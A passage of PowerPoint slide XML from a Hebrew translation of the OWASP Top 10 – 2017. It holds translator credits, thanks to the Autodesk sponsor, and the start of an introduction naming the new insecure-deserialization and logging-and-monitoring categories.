                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Torsten Gigler</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" marR="0" lvl="0" indent="-171450" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>עותק זה של המסמך תורגם לעברית ע"י אייל אסטרין (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t>@eyalestrin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>) ועומר לוי חברוני (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>@</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>omerlh</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:hlinkClick r:id="rId11"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcP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xmlns="" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="338516">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>החסות לפרויקט</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcP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xmlns="" val="2890284831"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1400397">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>תודה לחברת </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>Autodesk</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>עבור החסות למסמך </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP Top 10 – 2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ארגונים ויחידים אשר סיפקו מידע בנוגע לחולשות אבטחה נפוצות וסיוע נוסף רשומים בדף </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId15" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>התודות</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcP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xmlns="" val="2525440266"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Textplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t">
              <a:rot lat="0" lon="0" rev="1200000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d extrusionH="76200">
            <a:bevelT w="63500" h="25400"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>FW</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titel 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    הקדמה</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8729232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 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{006EF41C-22F0-4CD0-98DC-529189A47945}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3793594214"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990599"/>
          <a:ext cx="6858000" cy="8291511"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="341041">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ברוכים הבאים למסמך</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP Top 10 – 2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>!</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="7950470">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>העדכון העיקרי למסמך</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> זה מוסיף מספר נושאים חדשים, לרבות שני נושאים שנבחרו ע"י הקהילה – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A8:2017 - </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>פתיחה לא מאובטחת של רצף סדרתי</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ו-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A10:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t> – תיעוד וניטור בלתי מספקים</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. שני שינויים ממהדורות קודמות של מסמך </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> הנם משוב מהקהילה ומידע רב שהצטבר מעשרות ארגונים, ייתכן שמדובר בכמויות המידע הגדולות ביותר שהצטברו בהכנת תקן לפיתוח מאובטח. הדבר נותן לנו את הביטחון כי מסמך </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> מדבר על סיכוני האבטחה המהותיים ביותר העומדים בפני ארגונים.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="r" rtl="1">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>מסמך </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
